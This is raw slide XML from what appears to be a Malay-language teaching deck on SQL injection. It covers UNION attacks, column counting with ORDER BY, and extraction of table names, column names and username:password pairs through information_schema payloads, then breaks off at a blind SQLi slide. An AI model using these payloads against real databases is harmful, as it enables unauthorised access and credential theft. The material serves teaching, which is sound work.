            <a:endParaRPr lang="en-MY" sz="37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50FE3-1B16-4500-BF59-EB3C7A1E2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541" y="2016741"/>
            <a:ext cx="9856631" cy="2824517"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Untuk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melaksanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> SQL injection UNION attack, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kita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perlu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pastikan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bahawa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serangan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kita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memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kriteria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iaitu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:latin typeface="Ubuntu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500" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Berapakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> columns yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>akan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kita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dapat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daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> original query?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500" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Columns yang mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> original query yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> data ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="25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EE0162-383B-49F4-8D83-B2E237041347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="811369" y="1437426"/>
            <a:ext cx="105692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1BB3F-D357-4E0B-B14F-624A3BC1ACEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10668000" y="6413680"/>
            <a:ext cx="13737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2412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3BF6-BCAA-49F6-BA47-A4AFAF9BE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268" y="481637"/>
            <a:ext cx="9144000" cy="1041288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>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Bagaimanakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> check column di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> table query?</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="30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F5993-7C33-4657-80D6-FEDBA9CCD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67" y="1980131"/>
            <a:ext cx="10556383" cy="38024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900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Method yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>digunakan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adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> injecting a series of ORDER BY clauses dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dapatkan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spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> column index </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> error occurs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>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' ORDER BY 1 -- </a:t>
            </a:r>
          </a:p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' ORDER BY 2 --</a:t>
            </a:r>
          </a:p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' ORDER BY 3 –</a:t>
            </a:r>
          </a:p>
          <a:p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Apabila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kita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telah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capai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maksimum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spesifik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column index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nombor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daripada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actual columns di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dalam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set,  database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akan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keluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> error, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
              <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p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The ORDER BY position number 3 is out of range of the number of items in the select list.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C2A213-BA2C-4AD2-9B2E-FA255CF11C7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="751268" y="1751527"/>
            <a:ext cx="1036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B46E67-EB78-4FFE-B33B-9C628DFE58B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10668000" y="6387923"/>
            <a:ext cx="1481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66552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EAED-E798-4736-B3FA-CB692AB4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23" y="244698"/>
            <a:ext cx="9848046" cy="650853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Ubuntu"/>
              </a:rPr>
              <a:t>Cara </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Mencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> columns yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>mengandungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> data</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="30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8D03-60DB-4B2A-B4E3-9C99CAB02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4" y="1371132"/>
            <a:ext cx="10612191" cy="4984593"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Setelah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kita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berjaya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mendapatkan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bilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> columns yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kita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boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> try n error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>untuk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cari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dengan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cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> submit UNION SELECT payloads. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> query returns 4 columns, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>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' UNION SELECT ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY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a’,NULL,NULL,NULL</a:t>
            </a:r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--</a:t>
            </a:r>
          </a:p>
          <a:p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' UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY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NULL,’a’,NULL,NULL</a:t>
            </a:r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-- </a:t>
            </a:r>
          </a:p>
          <a:p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' UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY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NULL,NULL,’a’,NULL</a:t>
            </a:r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--</a:t>
            </a:r>
          </a:p>
          <a:p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' UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY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NULL,NULL,NULL,’a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY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’ –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY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sz="1900" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>ada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Ubuntu"/>
              </a:rPr>
              <a:t> column yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>tidak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Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>mempunyai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Ubuntu"/>
              </a:rPr>
              <a:t> data, column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>tersebut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Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>akan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Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> 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Ubuntu"/>
              </a:rPr>
              <a:t>error, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2929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Conversion failed when converting the varchar value ‘a’ to data type int.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-MY" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu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CAB8A5-D96F-486B-997F-B0608B9B9BA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661114" y="1133341"/>
            <a:ext cx="106121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A8A0F0-64E2-4930-8285-2774167AFAA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10547802" y="6407241"/>
            <a:ext cx="11977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5750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E5D3-8576-4B97-AD17-A67DED73F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85" y="283334"/>
            <a:ext cx="9144000" cy="625095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-MY" sz="3500" b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Extract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4907B-28FA-4911-B0CA-7F214DC9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85" y="1319616"/>
            <a:ext cx="10839718" cy="4790939"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> extract data table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p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1' and 1=2 union select 1,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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table_name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),3,4 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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information_schema.tables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where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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table_schema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= database() -- -</a:t>
            </a:r>
          </a:p>
          <a:p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sz="1900" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> extract column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> table yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng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i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu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Ubuntu"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
              <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p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1' and 1=2 union select 1,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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column_name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),3,4 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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information_schema.columns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where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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table_schema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= database() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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table_name</a:t>
            </a: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='user'-- -</a:t>
            </a:r>
          </a:p>
          <a:p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sz="1900" b="0" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Extract sensitive data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>table user 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</a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="charter"/>
              <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -</a:t>
            </a:r>
          </a:p>
          <a:p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lang="en-US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MY" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu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C18E91-9D40-47BD-ACE1-4321EA32787A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620332" y="1068946"/>
            <a:ext cx="10586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9093EF-8806-403E-8FCD-352F05F15265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10564968" y="6399861"/>
            <a:ext cx="1438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2605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9855-37C6-432D-8DF8-F6880FD4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42" y="425003"/>
            <a:ext cx="5121499" cy="5993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b="1" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Blind SQLi [Boolean Based]</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="3500" b="1" dirty="0">
              <a:latin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E3CB-8188-4F14-ABBF-0447F34FA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187" y="1761187"/>
            <a:ext cx="10650828" cy="4085820"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Mengapakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
